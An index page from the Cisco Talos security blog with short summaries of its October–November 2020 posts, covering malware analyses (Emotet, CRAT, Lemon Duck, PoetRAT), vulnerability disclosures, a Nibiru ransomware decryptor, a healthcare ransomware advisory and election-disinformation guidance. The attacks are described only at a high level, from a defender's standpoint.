Friday, November 20, 2020

Threat Roundup for November 13 to November 20


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 13 and Nov. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, November 19, 2020

Threat Source newsletter (Nov. 19, 2020)

Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

In case you hadn’t already realized, Snort somehow became a meme this week, so that was fun. 

As 2020 (finally...or already...I can’t decide which) comes to an end, we’re going to start doing a look back at the year that was in malware. And although Emotet has been around long before this year, 2020 was particularly peculiar for the botnet because it went virtually dormant over the summer before coming back over the few months. After we obtained ownership of several C2 domains that are part of Emotet, we looked at this threat’s trends and recent changes. 

We also released a new decryptor tool for the Nibiru ransomware. Any victims can use this to safely recover any files locked up as part of an infection. 

Wednesday, November 18, 2020

Back from vacation: Analyzing Emotet’s activity in 2020



By Nick Biasini, Edmund Brumaghin, and Jaeson Schultz.

Emotet is one of the most heavily distributed malware families today. Cisco Talos observes large quantities of Emotet emails being sent to individuals and organizations around the world on an almost daily basis. These emails are typically sent automatically by previously infected systems attempting to infect new systems with Emotet to continue growing the size of the botnets associated with this threat. Emotet is often the initial malware that is delivered as part of a multi-stage infection process and is not targeted in nature. Emotet has impacted systems in virtually every country on the planet over the past several years and often leads to high impact security incidents as the network access it provides to adversaries enables further attacks, such as big-game hunting and double-extortion ransomware attacks.

Cisco Talos obtained ownership of several domains that Emotet uses to send SMTP communications. We leveraged these domains to sinkhole email communications originating from the Emotet botnets for the purposes of observing the characteristics of these email campaigns over time and to gain additional insight into the scope and profile of Emotet infections and the organizations being impacted by this threat. Emotet has been observed taking extended breaks over the past few years, and 2020 was no exception. Let's take a look at what Emotet has been up to in 2020 and the effect it's had on the internet as a whole.

Tuesday, November 17, 2020

Nibiru ransomware variant decryptor



Nikhil Hegde developed this tool.

Weak encryption

The Nibiru ransomware is a .NET-based malware family. It traverses directories in the local disks, encrypts files with Rijndael-256 and gives them a .Nibiru extension. Rijndael-256 is a secure encryption algorithm. However, Nibiru uses a hard-coded string "Nibiru" to compute the 32-byte key and 16-byte IV values. The decryptor program leverages this weakness to decrypt files encrypted by this variant.

Ransomware

Nibiru ransomware is a poorly executed ransomware variant. It traverses directories and encrypts files with Rijndael-256. The files are given an extension, .Nibiru, after encryption. The ransomware targets numerous common file extensions but skips critical directories like Program Files, Windows and System Volume Information.

Extensions targeted by Nibiru:

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .jpg, .jpeg, .png, .psd, .txt, .zip, .rar, .html, .php, .asp, .aspx, .mp4, .avi, .3gp, .wmv, .MOV, .mp3, .wav, .flac, .wma, .mov, .raw, .apk, .encrypt, .crypted, .ahok, .cs, .vb.

Compiling

We've tested the Nibiru Ransomware Variant Decryptor tusing Visual Studio Community 2019, version 16.7.6 on Windows 10 running .NET Framework, version 4.8.03752. No additional packages are necessary to compile.

You can download the decryptor over at the Talos GitHub.

Example hash:

e0a681902f4f331582670e535a7d1eb3d6eff18d3fbed3ffd2433f898219576f

Friday, November 13, 2020

Threat Roundup for November 6 to November 13


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 6 and Nov. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, November 12, 2020

Vulnerability Spotlight: Multiple vulnerabilities in Pixar OpenUSD affects some versions of macOS



Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Aleksandar Nikolic and Jon Munshaw.

Pixar OpenUSD contains multiple vulnerabilities that attackers could exploit to carry out a variety of malicious actions. 

OpenUSD stands for “Open Universal Scene Descriptor.” Pixar uses this software for several types of animation tasks, including swapping arbitrary 3-D scenes that are composed of many different elements. Aimed at professional animation studios, the software is designed for scalability and speed as a pipeline connecting various aspects of the digital animation process. It is mostly expected to process trusted inputs in most use cases. This stands at odds with security considerations. 

The USD file format itself is used as an interchange file format inside Apple’s ARKit (Augmented Reality), SceneKit (3-D scene composition) and ModelIO (3-D modeling and animation) frameworks. Apple’s decision to use USD as the basis of its augmented reality platform makes it a potentially interesting attack surface. With the expansion of AR applications on both macOS and iOS platforms, this becomes more important for researchers to look at. 

Threat Source newsletter (Nov. 12, 2020)


Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

We’re back after a few-week hiatus! And to celebrate, we just dropped some new research on the CRAT trojan that’s bringing some ransomware friends along with it. This blog post has all the details of this threat along with what you can do to stay protected. 

We also had Microsoft Patch Tuesday this week. The company disclosed about 120 vulnerabilities this month that all users should patch now. Our blog post has a rundown of the most prominent bugs and you can check out the Snort rule update for all defenses against the exploitation of these vulnerabilities.  

And if you missed it last week, we recently put out an advisory alerting health care organizations of a recent spike in ransomware. If you have a customer that has been impacted by an attack, ransomware or otherwise, the first course of action is to engage Cisco Talos Incident Response Services (CTIR).  Please head to this page and follow the instructions for contacting IR at the top right of the page. 

CRAT wants to plunder your endpoints



By Asheer Malhotra.

  • Cisco Talos has observed a new version of a remote access trojan (RAT) family known as CRAT.
  • Apart from the prebuilt RAT capabilities, the malware can download and deploy additional malicious plugins on the infected endpoint.
  • One of the plugins is a ransomware known as "Hansom."
  • CRAT has been attributed to the Lazarus APT Group in the past.
  • The RAT consists of multiple obfuscation techniques to hide strings, API names, command and control (C2) URLs and instrumental functions, along with static detection evasion.
  • The attack also employs a multitude of anti-infection checks to evade sandbox based detection systems.

What's new?

Cisco Talos has recently discovered a new version of the CRAT malware family. This version consists of multiple RAT capabilities, additional plugins and a variety of detection-evasion techniques. In the past, CRAT has been attributed to the Lazarus Group, the malicious threat actors behind multiple cyber campaigns, including attacks against the entertainment sector.

Indicators and tactics, techniques and procedures (TTPs) discovered by this investigation resemble those of the Lazarus Group.

How did it work?

The attack consists of a highly modular malware that can function as a standalone RAT and download and activate additional malicious plugins from its C2 servers. Cisco Talos has discovered multiple plugins so far, consisting of ransomware, screen-capture, clipboard monitoring and keylogger components.

So what?

This attack demonstrates how the adversary operates an attack that:
  • Uses obfuscation and extensive evasion techniques to hide its malicious indicators.
  • Has evolved across versions to achieve effectiveness of their attack.
  • Employs a highly modular plugin framework to selectively infect targeted endpoints.
  • Most importantly, it deploys RAT malware to ransack the endpoint, followed by deployment of ransomware to either extort money or burn infrastructure of targeted entities.

Tuesday, November 10, 2020

Microsoft Patch Tuesday for Nov. 2020 — Snort rules and prominent vulnerabilities

 

By Jon Munshaw, with contributions from Joe Marshall.

Microsoft released its monthly security update Tuesday, disclosing just over 110 vulnerabilities across its products. This is a slight jump from last month when Microsoft disclosed one of their lowest vulnerability totals in months.  

Eighteen of the vulnerabilities are considered “critical" while the vast remainder are ranked as “important,” with two also considered of “low” importance. Users of all Microsoft and Windows products are urged to update their software as soon as possible to avoid possible exploitation of all these bugs.  

The security updates cover several different products and services, including the HEVC video file extension, the Azure Sphere platform and Microsoft Exchange servers.

Friday, November 6, 2020

Threat Roundup for October 30 to November 6


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 30 and Nov. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, November 5, 2020

Vulnerability Spotlight: Multiple JavaScript vulnerabilities in Adobe Acrobat Reader



 Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Joe Marshall



Cisco Talos recently discovered an heap buffer overflow and a use after free vulnerability in Adobe Acrobat Reader. Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into
web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger these vulnerabilities.
In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC JavaScript submitForm heap buffer overflow (TALOS-2020-1157/CVE-2020-24435)

A specific JavaScript code embedded in a PDF file can lead to out of bounds memory access when opening a PDF document in Adobe Acrobat Reader DC 2020.006.20034. With careful memory manipulation, this can lead to sensitive information being disclosed as well as memory corruption which can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

When testing a newer version of Adobe Acrobat Reader, it was discovered that we were able to reproduce a previously patched vulnerability again. 

Namely, a heap buffer overflow vulnerability, TALOS-2020-1031, was disclosed to Adobe and patched in an update on the fifth of April. Details of the vulnerability remain the same.

Read the complete vulnerability advisory here for additional information. 

Vulnerability details

Adobe Acrobat Reader DC form field format use after free (TALOS-2020-1156 / CVE-2020-24437)

A specific JavaScript code embedded in a PDF file can lead to a heap corruption when opening a PDF document in Adobe Acrobat Reader DC 2020.006.20043. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Read the complete vulnerability advisory here for additional information. 

Versions tested

Talos tested and confirmed that version 2020.012.20043 of Adobe Acrobat Reader DC is affected by this vulnerability.





Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 53563-53564, 55842-55843

Friday, October 30, 2020

Cisco Talos Advisory on Adversaries Targeting the Healthcare and Public Health Sector

Background

Cisco Talos has become aware that an adversary is leveraging Trickbot banking trojan and Ryuk ransomware to target U.S. hospitals and healthcare providers at an increasing rate. Security journalists reported on October 28, 2020 that the adversary was preparing to encrypt systems at “potentially hundreds” of medical centers and hospitals, based on a tip from a researcher who had been monitoring communications for the threat actor. On October 28 and 29, these claims were supported by the reports of six U.S. hospitals being compromised with Ryuk in the span of 24 hours

CISA, the FBI, and HHS also confirmed this activity targeting the Healthcare and Public Health Sector, releasing a joint advisory on October 28, 2020. The advisory stated that the Ryuk actors were using Trickbot to target the industry and that the activity posed an “increased and imminent” threat. They also published technical indicators for both Trickbot and Ryuk. 

Talos has years of experience dealing with Trickbot, Ryuk, and other tools used by the adversary. We are currently supporting customers who are affected and working hand-in-hand with federal law enforcement to support their investigations.  We are also supporting other law enforcement and federal agencies as well.

If you have a customer that has been impacted by an attack, ransomware or otherwise, the first course of action is to engage Cisco Talos Incident Response Services (CTIR).  Please head to https://talosintelligence.com/IR and follow the instructions for contacting IR at the top right of the page.
 

Threat Roundup for October 23 to October 30


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 23 and Oct. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, October 29, 2020

DoNot’s Firestarter abuses Google Firebase Cloud Messaging to spread



By Warren Mercer, Paul Rascagneres and Vitor Ventura.

  • The newly discovered Firestarter malware uses Google Firebase Cloud Messaging to notify its authors of the final payload location.
  • Even if the command and control (C2) is taken down, the DoNot team can still redirect the malware to another C2 using Google infrastructure.
  • The approach in the final payload upload denotes a highly personalized targeting policy.

What's new? The DoNot APT group is making strides to experiment with new methods of delivery for their payloads. They are using a legitimate service within Google's infrastructure which makes it harder for detection across a users network.

How did it work? Users are lured to install a malicious app on their mobile device. This malicious app then contains additional malicious code which attempts to download a payload based on information obtained from the compromised device. This ensures only very specific devices are delivered the malicious payload.

So what? Innovation across APT Groups is not unheard of and this shouldn't come as a huge surprise that a group continues to modify their operations to ensure they are as stealth as can be. This should be another warning sign to folks in geo-politically "hot" regions that it is entirely possible that you can become a victim of a highly motivated group.

Beers with Talos ep. #95: Election 2020 – Advice for voters and election officials




Beers with Talos (BWT) Podcast episode No. 95 is now available. Download this episode and
subscribe to Beers with Talos:
If iTunes and Google Play aren't your thing, click here.

By Mitch Neff.

Recorded Oct. 9, 2020


We are running a short bench today after Nigel’s retirement last ep and Joel being on vacation. We start off talking about how specific use cases don’t equate to the death of entire defensive technologies, despite the frequent assertions otherwise that you may find on Twitter. The key to defense in depth is that no silver bullet stops everything - nothing is surprising here.

The big focus of this EP, leading into the 2020 election is, of course, election security. We recap some important points from our research and go over materials we have put together for election officials and voters alike. Please take a minute to go though the links in the extended show notes for a full list of Talos elections security and disinformation resources.

Vulnerability Spotlight: Multiple vulnerabilities in Synology SRM (Synology Router Manager)


Claudio Bozzato of Cisco Talos discovered these vulnerabilities. Blog by Claudio Bozzato and Jon Munshaw.

Cisco Talos recently discovered multiple remote vulnerabilities in software that helps power Synology routers. The bugs exist in Synology Router Manager (SRM) — a Linux-based operating system for Synology routers — and QuickConnect, a feature inside SRM that allows users to remotely connect to their routers. An adversary could use these vulnerabilities to carry out a range of malicious actions, including executing remote code on the device, the exposure of sensitive information regarding the victim’s network and communication with other devices connected to the same network.

Friday, October 23, 2020

Threat Roundup for October 16 to October 23


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 16 and Oct. 23. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Wednesday, October 21, 2020

Vulnerability Spotlight: A deep dive into WAGO’s cloud connectivity and the vulnerabilities that arise


Report and research by Kelly Leuschner.

WAGO makes several programmable automation controllers that are used in many industries including automotive, rail, power engineering, manufacturing and building management. Cisco Talos discovered 41 vulnerabilities in their PFC200 and PFC100 controllers. In accordance with our coordinated disclosure policy, Cisco Talos worked with WAGO to ensure that these issues were resolved and that a firmware update is available for affected customers.

Since a patch has been available to affected customers for some time, we wanted to take this opportunity to discuss several attack chains that exploit WAGO’s cloud connectivity client known as “dataagent” to gain root access to the device. You can also catch a technical presentation of these vulnerabilities at the virtual CS3Sthlm conference on Oct. 22, 2020. 

WAGO provides a cloud connectivity feature for users to access remote telemetry from their devices and even issue firmware updates remotely. Cloud connectivity provides an interesting attack vector, where the attack originates from a trusted cloud provider but the cloud instance itself is attacker-controlled. The scenario we will dive into today is one where the attacker has access to legitimate cloud infrastructure and can abuse WAGO’s custom protocol to gain root privileges on the device.

We’ll first dive into the technical details of each of the vulnerabilities themselves. Then we’ll discuss how these vulnerabilities can be combined in two distinct attack chains that result in the ability to gain root privileges on the device.

What to expect when you’re electing: A recap

We’re roughly two weeks out from Election Day in America, although millions of early and mail-in votes have already been cast. In the coming days, there’s sure to be a flurry of news stories about disinformation, allegations of voter fraud, the back-and-forth between parties and talks of when the results can be trusted, and someone can call the presidential race. 

While Cisco Talos can’t provide you all the answers, we can at least give you an idea of what American election officials at the state, local and national levels are currently facing. We at Talos and elsewhere across Cisco Secure have released several research papers, blog posts, graphics, videos and more discussing election security and disinformation this year. 

Here’s a complete list of everything we’ve covered so far. Please share this information with friends, family members and colleagues as we all try to keep up with the news cycle between now and Nov. 3 (and likely far beyond that). 

Tuesday, October 20, 2020

Vulnerability Spotlight: Code execution vulnerability in Google Chrome WebGL

 

Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Google Chrome web browser contains a vulnerability that could be exploited by an adversary to gain the ability to execute code on the victim machine. Chrome is one of the most popular web browsers currently available to users. Cisco Talos researchers recently discovered a bug in WebGL, which is a Chrome API responsible for displaying 3-D graphics.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Google to ensure that these issues are resolved and that an update is available for affected customers.

Dynamic Data Resolver - Version 1.0.1 beta

By Holger Unterbrink.

Cisco Talos is releasing a new beta version of Dynamic Data Resolver (DDR) today. This release comes with a new architecture for samples using multi-threading. The process and thread tracing has been completely reimplemented.

We also fixed a few bugs and memory leaks. Another new feature is that the DDR backend now comes in two flavors: a release version and a debugging version. The latter will improve code quality and bug hunting. It helps to detect memory leaks and minor issues which are silently handled by the underlying DynamoRIO framework in the release version. We also improved the installer and the IDA plugin is now installed to the user plugin directory instead to the IDA installation directory under Program Files. The IDA plugin and all its dependencies are also now automatically installed by a script.  

You can download DDR, version 1.0.1 beta here

Fantastic news! DDR has won the HexRays IDA plugin contest 2020

We would like to thank HexRays for recognizing this plugin and awarding it with the first prize in their IDA plugin contest. We hope HexRays keeps up the fantastic work they are doing with IDA. It makes our reverse-engineering lives a bit easier every day.

Friday, October 16, 2020

Threat Roundup for October 9 to October 16


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 9 and Oct. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Beers with Talos ep. #94: Nigel is marching on, victorious and glorious



Beers with Talos (BWT) Podcast episode No. 94 is now available. Download this episode and
subscribe to Beers with Talos:
If iTunes and Google Play aren't your thing, click here.

By Mitch Neff.

Recorded Sept. 25, 2020


Today is Nigel’s last episode as a regular host of BWT. Join us in wishing him a happy transition to his next chapter. As we all know, Nigel won’t ever actually retire. Today’s show is us chatting with Nigel — about his career and his take on the industry as he entered, and now as he moves on to whatever comes next. Every aspect of Talos is better off because Nigel was here, as well as so many of the people he came across along the way.

We will all miss your daily presence, but we are excited to see what you come up with next. Cheers.

Thursday, October 15, 2020

Threat Source newsletter (Oct. 15, 2020)



Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

In our latest entry into our election security series, we’re turning our attention to the professionals who are responsible for securing our elections. After months of research, we’ve compiled a series of recommendations for local, state and national officials to combat disinformation and secure Americans’ faith in the election system. 

Patch Tuesday was also this week, which as usual, brought with it a big Snort rule release and our breakdown of the important Microsoft vulnerabilities you need to know about. 

What to expect when you're electing: How election officials can counter disinformation

 

By Matthew Olney and the communications and public relations professionals at Cisco.

Editor's Note: For more on this topic, sign up for a Cisco Duo webinar on election security on Oct. 15 at 1 p.m. ET here.

In our work with our partners in the election security space, the most difficult question we’ve been asked is “What do we do about disinformation campaigns?” This isn’t something Talos usually specializes in, as it’s not a true technical security problem. However, one of the great benefits of working at Cisco is the incredible breadth of capability of our coworkers and partners. So, correctly framing the question as a communications issue, we worked with Cisco communications professionals and our outside communications partners to put together an outline of a communications plan for elections officials facing disinformation campaigns. 

To help the reader understand why we’re making the recommendations we are, we will summarize here the findings of our previous reports on elections security and disinformation. In short, we have found that while one of the goals of foreign adversaries may be to favor a particular candidate, the primary objective of both disinformation campaigns and election interference up to this point is to aggravate existing social, cultural and political divisions and sow doubt about the fairness and integrity of Western democracies. The driving goal here is to weaken the United States and other global democratic powers to allow foreign adversaries to more easily achieve their geopolitical objectives. Here's a similar set of recommendations specifically for voters.

Vulnerability Spotlight: Code execution, information disclosure vulnerabilities in F2FS toolset



Vulnerabilities discovered by a Cisco Talos researcher. Blog by Jon Munshaw.

Cisco Talos recently discovered multiple code execution and information disclosure vulnerabilities in various functions of the F2FS toolset. F2FS is a filesystem toolset commonly found in embedded
devices that creates, verifies and/or fixes Flash-Friendly File System files. An attacker could provide a malicious file to the target to trigger these vulnerabilities, causing a variety of negative conditions for the target.

In accordance with Cisco’s coordinated disclosure policy, we are disclosing these vulnerabilities without an update from F2FS after the organization failed to meet the 90-day deadline.

Tuesday, October 13, 2020

Vulnerability Spotlight: Denial of service in AMD ATIKMDAG.SYS driver

  

Piotr Bania of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a denial-of-service vulnerability in the ATIKMDAG.SYS driver for some AMD graphics cards. An attacker could send the victim a specially crafted D3DKMTCreateAllocation API request to cause an out-of-bounds read, leading to a denial-of-service condition. This vulnerability could be triggered from a guest account.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to disclose this vulnerability and ensure an update is available

Microsoft Patch Tuesday for Oct. 2020 — Snort rules and prominent vulnerabilities



By Jon Munshaw, with contributions from Alex McDonnell and Nick Biasini.

Microsoft released its monthly security update Tuesday, disclosing just under 100 vulnerabilities across its array of products.  

Fourteen of the vulnerabilities are considered “critical" while the vast remainder are ranked as “important.” Users of all Microsoft and Windows products are urged to update their software as soon as possible to avoid possible exploitation of all these bugs.

Vulnerability Spotlight: Information leak vulnerability in Google Chrome WebGL



Marcin Towalski of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Google Chrome web browser contains a vulnerability that could be exploited by an adversary to carry out a range of malicious actions. Chrome is one of the most popular web browsers currently available to users. Cisco Talos researchers recently discovered a bug in WebGL, which is a Chrome API responsible for displaying 3-D graphics.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Google to ensure that these issues are resolved and that an update is available for affected customers.

Lemon Duck brings cryptocurrency miners back into the spotlight



By Vanja Svajcer, with contributions from Caitlin Huey.

  • We are used to ransomware attacks and big-game hunting making headlines, but there are still methods adversaries use to monetize their efforts in less intrusive ways.
  • Cisco Talos recently recorded increased activity of the Lemon Duck cryptocurrency-mining botnet using several techniques likely to be spotted by defenders, but are not immediately obvious to end-users.
  • These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably T1203 (Exploitation for Client Execution), T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1035 (Service Execution), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1053 (Scheduled Task), T1562.004 (Impair Defenses: Disable or Modify System Firewall) and T1218.005 (Signed Binary Proxy Execution: Mshta).


Attackers are constantly reinventing ways of monetizing their tools. Cisco Talos recently discovered a complex campaign employing a multi-modular botnet with multiple ways to spread. This threat, known as "Lemon Duck," has a cryptocurrency mining payload that steals computer resources to mine the Monero virtual currency. The actor employs various methods to spread across the network, like sending infected RTF files using email, psexec, WMI and SMB exploits, including the infamous Eternal Blue and SMBGhost threats that affect Windows 10 machines. Some variants also support RDP brute-forcing. In recent attacks we observed, this functionality was omitted. The adversary also uses tools such as Mimikatz, that help the botnet increase the amount of systems participating in its mining pool.

What's new?


Although this threat has been active since at least the end of December 2018, we have noticed an increase in its activity at the end of August 2020.

How did it work?


The infection starts with a PowerShell loading script, which is copied from other infected systems with SMB, email or external USB drives. The actor also employs several exploits for vulnerabilities such as SMBGhost and Eternal Blue. The code exploiting the Bluekeep vulnerability is also present but it is disabled in the version we analysed.

The botnet has executable modules that get downloaded and driven by the main module, which communicates with the command and control (C2) server over HTTP.

The email-spreading module uses COVID-19-related subject lines and text, with an infected attachment sent using Outlook automation to every contact in the affected user's address book.

So what?


Defenders need to be constantly vigilant and monitor the behavior of systems within their network to spot new resource-stealing threats such as cryptominers. Cryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs. While organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.


Vulnerability Spotlight: Denial-of-service vulnerabilities in Allen-Bradley Flex I/O



Jared Rittle of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

The Allen-Bradley Flex input/output system contains multiple denial-of-service vulnerabilities in its ENIP request path data segment. These bugs exist specifically in the 1794-AENT FLEX I/O modular platform. It provides many I/O operations and servers as a smaller physical device compared to other similar hardware. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious packet to the target device, causing a loss of communication between the victim’s network and the device, resulting in a denial of service.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Allen-Bradley to ensure that these issues are resolved and that an update is available for affected customers.

Friday, October 9, 2020

Threat Roundup for October 2 to October 9


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 2 and Oct. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, October 8, 2020

Threat Source newsletter for Oct. 8, 2020

 

Newsletter compiled by Jon Munshaw.

Good afternoon, Talos readers. 

We’ve been writing and talking about election security a ton lately. And as the U.S. presidential election draws closer, we decided it was time to summarize some things. So, we released this blog post with our formal recommendations for voters and how they can avoid disinformation and other bad actors trying to influence the election. 

Our researchers are also following the development of the PoetRAT malware. This remote access trojan is still targeting public and private entities in Azerbaijan, and we’ve seen the actor behind the threat make several tweaks over time to make it more agile and difficult to detect. 

If vulnerability research is more your thing, we also have a deep dive into our work discovering bugs in Microsoft Azure Sphere as part of a challenge from Microsoft. In all, we disclosed 16 vulnerabilities. Here’s what you need to know about them and how to stay protected. 

Wednesday, October 7, 2020

Vulnerability Spotlight: DoS vulnerability in ATIKMDAG.SYS AMD graphics driver

 

Piotr Bania of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a denial-of-service vulnerability in the ATIKMDAG.SYS driver for some AMD graphics cards. An attacker could send the victim a specially crafted D3DKMTCreateAllocation API request to cause an out-of-bounds read, leading to a denial-of-service condition. This vulnerability could be triggered from a guest account.

In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to disclose this vulnerability. AMD has disclosed this vulnerability and released notes on it but does not plan to have an official patch until Q1 of 2021.

What to expect when you’re electing: Voter recommendations



By Amy Henderson. 

Information operations have been around for millennia, yet with the advent of the internet and the democratization of content creation, the barriers to entry have lowered to a point that anyone can play now.   

In the course of our latest research on disinformation, with an eye toward election security, we have covered the what, how and why of disinformation campaigns, state and non-state actors that engage in this behavior, as well as the psychological effect on society.  To finalize this research, we want to ensure that we leave our audience with actionable guidance on how they can counteract disinformation, stop the spread and educate themselves.  

Tuesday, October 6, 2020

90 days, 16 bugs, and an Azure Sphere Challenge




Cisco Talos reports 16 vulnerabilities in Microsoft Azure Sphere's sponsored research challenge.


By Claudio Bozzato, Lilith [-_-]; and Dave McDaniel. 


On May 15, 2020, Microsoft kicked off the Azure Sphere Security Research Challenge, a three-month initiative aimed at finding bugs in Azure Sphere. Among the teams and individuals selected, Cisco Talos conducted a three-month sprint of research into the platform and reported 16 vulnerabilities of various severity, including a privilege escalation bug chain to acquire Azure Sphere Capabilities, the most valuable Linux normal-world permissions in the Azure Sphere context. 

The Azure Sphere platform is a cloud-connected and custom SoC platform designed specifically for IoT application security. Internally, the SoC is made up of a set of several ARM cores that have different roles (e.g. running different types of applications, enforcing security, and managing encryption). Externally, the Azure Sphere platform is supported by Microsoft’s Azure Cloud, which handles secure updates, app deployment, and periodic verification of device integrity to determine if Azure Cloud access should be allowed or not. Note however, that while the Azure Sphere is updated and deploys through the Azure Cloud, customers can still interact with their own servers independently.

PoetRAT: Malware targeting public and private sector in Azerbaijan evolves



By Warren Mercer, Paul Rascagneres and Vitor Ventura.

  • The Azerbaijan public sector and other important organizations are still targeted by new versions of PoetRAT.
  • This actor leverages malicious Microsoft Word documents alleged to be from the Azerbaijan government.
  • The attacker has moved from Python to Lua script.
  • The attacker improves their operational security (OpSec) by replacing protocol and performing reconnaissance on compromised systems.

Executive summary


Cisco Talos discovered PoetRAT earlier this year. We have continued to monitor this actor and their behavior over the preceding months. We have observed multiple new campaigns indicating a change in the actor's capabilities and showing their maturity toward better operational security. We assess with medium confidence this actor continues to use spear-phishing attacks to lure a user to download a malicious document from temporary hosting providers. We currently believe the malware comes from malicious URLs included in the email, resulting in the user clicking and downloading a malicious document. These Word documents continue to contain malicious macros, which in turn download additional payloads once the attacker sets their sites on a particular victim. Previous versions of PoetRAT deployed a Python interpreter to execute the included source code which resulted in a much larger file size compared to the latest version's switch to Lua script. As the geopolitical tensions grow in Azerbaijan with neighbouring countries, this is no doubt a stage of espionage with national security implications being deployed by a malicious actor with a specific interest in various Azerbajiani government departments.